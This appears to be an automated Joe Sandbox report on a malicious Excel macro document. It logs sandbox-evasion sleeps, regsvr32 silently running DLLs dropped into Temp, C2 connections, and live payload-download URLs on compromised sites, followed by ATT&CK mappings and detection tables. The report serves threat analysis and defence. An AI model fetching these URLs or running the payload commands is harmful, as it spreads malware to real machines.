Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -357000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -169000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -134000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -162000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -345000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812 | Thread sleep time: -960000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -253000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -291000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 | Thread sleep time: -293000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1440 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -359000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -175000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -144000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -179000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -131000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 | Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340 | Thread sleep time: -1080000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -124000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -291000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -262000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -332000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -309000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -160000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -351000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 | Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2016 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -133000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -299000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2788 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 | Thread sleep time: -144000s >= -30000s

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 194.225.58.214 187
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting32 | Path Interception | Process Injection112 | Masquerading11 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection112 | Security Account Manager | Process Discovery11 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer14 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting32 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr321 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol24 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery23 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph

Behavior Graph ID: 342170 | Sample: printouts of outstanding as... | Start date: 20/01/2021 | Architecture: WINDOWS | Score: 100
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 8 other signatures
EXCEL.EXE (244 created registry values, 70 created files) started
  DNS/IP: bafnabrotherskesarwala.com (103.11.153.223, ports 49166, 80, WEBWERKS-AS-INWebWerksIndiaPvtLtdIN, India); salaodigitalautomovel.pt.deve.pt (185.32.190.115, ports 49181, 80, PTSERVIDORPT, Portugal); 6 other IPs or domains
  Dropped files: C:\Users\user\AppData\Local\...\zsijkwsd.dll (PE32); C:\Users\user\AppData\Local\...\zlgzuxvz.dll (PE32); C:\Users\user\AppData\Local\Temp\ogsit.dll (PE32); 5 other malicious files
  Signatures: Document exploit detected (creates forbidden files); Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
  Child processes: regsvr32.exe; regsvr32.exe; regsvr32.exe; 11 other processes
  Each regsvr32.exe in turn started a further regsvr32.exe (six child instances shown in the graph)
  Signature on the child regsvr32.exe instances: System process connects to network (likely due to code injection or exploit)
  DNS/IP of the child regsvr32.exe instances: 194.225.58.214 (ports 443, 49170, 49171, TUMS-IR-ASIR, Iran (ISLAMIC Republic Of)); 198.57.200.100 (ports 3786, 49177, 49180, UNIFIEDLAYER-AS-1US, United States); 211.110.44.63 (ports 49173, 49174, 49182, SKB-ASSKBroadbandCoLtdKR, Korea Republic of); 69.164.207.140 (ports 3388, 49175, 49178, LINODE-APLinodeLLCUS, United States)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
printouts of outstanding as of 01_20_2021.xlsm | 25% | Virustotal | -
printouts of outstanding as of 01_20_2021.xlsm | 11% | ReversingLabs | Script-Macro.Trojan.Logan

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip | 4% | ReversingLabs | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip | 4% | ReversingLabs | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar | 4% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\ogsit.dll | 4% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll | 4% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\zsijkwsd.dll | 4% | ReversingLabs | -

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://198.57.200.100:3786/hy;R | 0% | Avira URL Cloud | safe
https://211.110.44.63:5353/ | 0% | Avira URL Cloud | safe
https://69.164.207.140/ | 0% | Avira URL Cloud | safe
https://194.225.58.214/5 | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://194.225.58.214/ | 0% | Avira URL Cloud | safe
https://211.110.44.63/~ | 0% | Avira URL Cloud | safe
https://194.225.58.214/9 | 0% | Avira URL Cloud | safe
http://laureys.be/cgi-sys/suspendedpage.cgi | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
https://69.164.207.140:3388/hy | 0% | Avira URL Cloud | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://cms.ivpr.org/by9zwa7p1.zip | 100% | Avira URL Cloud | malware
https://69.164.207.140/q | 0% | Avira URL Cloud | safe
https://69.164.207.140:3388/ | 0% | Avira URL Cloud | safe
http://bafnabrotherskesarwala.com/ys95lm6k.rar | 0% | Avira URL Cloud | safe
https://198.57.200.100:3786/ | 0% | Avira URL Cloud | safe
https://211.110.44.63/h | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
https://198.57.200.100/ | 0% | Avira URL Cloud | safe
http://monitrade.net/h79fwesfe.rar | 100% | Avira URL Cloud | malware
https://211.110.44.63/ | 0% | Avira URL Cloud | safe
http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip | 100% | Avira URL Cloud | malware
http://www.gastronauts.asia/ylztwx.rar | 0% | Avira URL Cloud | safe
http://laureys.be/uzssv27.rar | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://artec.com.tr/xkpffwn.zip | 100% | Avira URL Cloud | malware
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bafnabrotherskesarwala.com | 103.11.153.223 | true | false | - | unknown
salaodigitalautomovel.pt.deve.pt | 185.32.190.115 | true | false | - | unknown
monitrade.net | 192.185.147.185 | true | false | - | unknown
laureys.be | 85.17.252.207 | true | false | - | unknown
artec.com.tr | 46.28.239.13 | true | false | - | unknown
cms.ivpr.org | 64.37.52.138 | true | false | - | unknown
gastronauts.asia | 132.148.96.144 | true | false | - | unknown
www.gastronauts.asia | unknown | unknown | false | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://laureys.be/cgi-sys/suspendedpage.cgi | false | Avira URL Cloud: safe | unknown
http://cms.ivpr.org/by9zwa7p1.zip | true | Avira URL Cloud: malware | unknown
http://bafnabrotherskesarwala.com/ys95lm6k.rar | false | Avira URL Cloud: safe | unknown
http://monitrade.net/h79fwesfe.rar | true | Avira URL Cloud: malware | unknown
http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip | true | Avira URL Cloud: malware | unknown
http://www.gastronauts.asia/ylztwx.rar | false | Avira URL Cloud: safe | unknown
http://laureys.be/uzssv27.rar | true | Avira URL Cloud: malware | unknown
http://artec.com.tr/xkpffwn.zip | true | Avira URL Cloud: malware | unknown


Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.32.190.115 | unknown | Portugal | 62416 | PTSERVIDORPT | false
85.17.252.207 | unknown | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | false
103.11.153.223 | unknown | India | 133296 | WEBWERKS-AS-INWebWerksIndiaPvtLtdIN | false
46.28.239.13 | unknown | Turkey | 42910 | PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR | false
198.57.200.100 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
69.164.207.140 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
211.110.44.63 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
192.185.147.185 | unknown | United States | 26337 | OIS1US | false
132.148.96.144 | unknown | United States | 398101 | GO-DADDY-COM-LLCUS | false
64.37.52.138 | unknown | United States | 33182 | DIMENOCUS | false
194.225.58.214 | unknown | Iran (ISLAMIC Republic Of) | 43965 | TUMS-IR-ASIR | true

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:342170
                        Start date:20.01.2021
                        Start time:16:12:12
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 31s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:printouts of outstanding as of 01_20_2021.xlsm
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.expl.evad.winXLSM@41/22@7/11
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xlsm
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 93.184.221.240, 2.20.142.209, 2.20.142.210
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
• Execution Graph export aborted for target regsvr32.exe, PID 1428 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 2372 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 2424 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 2848 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 856 because there are no executed functions
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
16:13:56 | API Interceptor | 1750x Sleep call for process: regsvr32.exe modified

                        Joe Sandbox View / Context

                        IPs

Match: associated sample name or URL (detection); context
Match: 69.164.207.140
• Statement of Account as of 01_20_2021.xlsm (malicious)
• sample20210120-01.xlsm (malicious)
• by9zwa7p1zip.dll (malicious)
• Information_265667970.doc (malicious)
• Order-565822389.doc (malicious)
• Documentation-435217538.doc (malicious)
• ghen5nlzip.dll (malicious)
• vgw2ufi.jpg.dll (malicious)
• Invoice_11_11_2020.xlsm (malicious)
• Invoice_12-11-2020.xls (malicious)
• q7ad0mzkgif.dll (malicious)
• Sales_Invoice_873878_071601_from_Inc.xlsm (malicious)
• Invoice_334654_168522_from_Inc.xlsm (malicious)
• Invoice_403372_917428_from_Inc.xlsm (malicious)
Match: 185.32.190.115
• Statement of Account as of 01_20_2021.xlsm (malicious); context: carzone.deve.pt/s3zpciz99.rar
Match: 85.17.252.207
• sample20210120-01.xlsm (malicious); context: laureys.be/uzssv27.rar
Match: 46.28.239.13
• sample20210120-01.xlsm (malicious); context: artec.com.tr/xkpffwn.zip
Match: 198.57.200.100
• Statement of Account as of 01_20_2021.xlsm (malicious)
• sample20210120-01.xlsm (malicious)
• by9zwa7p1zip.dll (malicious)
• Amazon_eGift-Card.451219634.doc (malicious)
• Order_Gift_Card.961396645.doc (malicious)
• eGift-CardAmazon.907427310.doc (malicious)
• Gift_Card_209788849.doc (malicious)
• Order_Gift_Card_411022863.doc (malicious)
• Amazon_Gift-Card.579177920.exe (malicious)
• Amazon_eGift-Card_579366314.exe (malicious)
• pzxrk4325.dll (malicious)
• Gift_Card-.exe (malicious)
• nsetldk.dll (malicious)
• Gift_Card-20513935.exe (malicious)

                                                                                Domains

Match: associated sample name or URL (detection); context
Match: artec.com.tr
• sample20210120-01.xlsm (malicious); context: 46.28.239.13
Match: monitrade.net
• sample20210120-01.xlsm (malicious); context: 192.185.147.185
Match: laureys.be
• sample20210120-01.xlsm (malicious); context: 85.17.252.207

                                                                                ASN

Match: associated sample name or URL (detection); context
Match: LEASEWEB-NL-AMS-01NetherlandsNL
• sample20210120-01.xlsm (malicious); context: 85.17.252.207
• VCS58GQMhuCYghC.exe (malicious); context: 5.79.70.98
• FHT210995.exe (malicious); context: 37.48.65.150
• Statement for T10495.jar (malicious); context: 212.32.237.90
• CQcT4Ph03Z.exe (malicious); context: 37.48.65.150
• Y75vU558UfuGbzM.exe (malicious); context: 5.79.70.98
• SHEXD2101127S_ShippingDocument_DkD.xlsx (malicious); context: 37.48.65.148
• tcwO1bua5E.exe (malicious); context: 5.79.72.163
• 87e8ff5c51e0.xls (malicious); context: 5.79.72.163
• equinix-customer-portal.apk (malicious); context: 37.48.77.161
• z9TZyyfUsq.exe (malicious); context: 37.48.65.150
• YvGnm93rap.exe (malicious); context: 37.48.65.150
• 5DY3NrVgpI.exe (malicious); context: 37.48.65.149
• anydesk (1).exe (malicious); context: 178.162.151.213
• T0pH7Bimeq.exe (malicious); context: 37.48.65.151
• c6Rg7xug26.exe (malicious); context: 212.32.237.101
• parler.apk (malicious); context: 37.48.77.180
• parler.apk (malicious); context: 37.48.77.162
• Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtf (malicious); context: 5.79.72.163
• http://search.hwatchtvnow.co (malicious); context: 178.162.133.149
Match: PTSERVIDORPT
• Statement of Account as of 01_20_2021.xlsm (malicious); context: 185.32.190.115
• EAvDkVMy22.doc (malicious); context: 185.32.188.19
• cUv4fniDWj.doc (malicious); context: 185.32.188.19
• UAM4Ec26io.doc (malicious); context: 185.32.188.19
• WtmfKeL3bS.doc (malicious); context: 185.32.188.19
• 20OetOSFOv.doc (malicious); context: 185.32.188.19
• rJ6LBcOAZ7.doc (malicious); context: 185.32.188.19
• p0MPFx4N7y.doc (malicious); context: 185.32.188.19
• ps5ZCs1aiT.doc (malicious); context: 185.32.188.19
• b0YjMtDv32.doc (malicious); context: 185.32.188.19
• PsE3ZwU4Yh.doc (malicious); context: 185.32.188.19
• KJHzM29Bgx.doc (malicious); context: 185.32.188.19
• kck5b6zy6e.doc (malicious); context: 185.32.188.19
• Xe0OLFzjRy.doc (malicious); context: 185.32.188.19
• iQbpPSLytp.doc (malicious); context: 185.32.188.19
• pxVglLqCsa.doc (malicious); context: 185.32.188.19
• ai76sn4zOU.doc (malicious); context: 185.32.188.19
• jWyAXi88gm.doc (malicious); context: 185.32.188.19
• dWMVGY2xXo.doc (malicious); context: 185.32.188.19
• R1RiBRChvm.doc (malicious); context: 185.32.188.19
Match: WEBWERKS-AS-INWebWerksIndiaPvtLtdIN
• payment infirmation.exe (malicious); context: 206.183.111.188
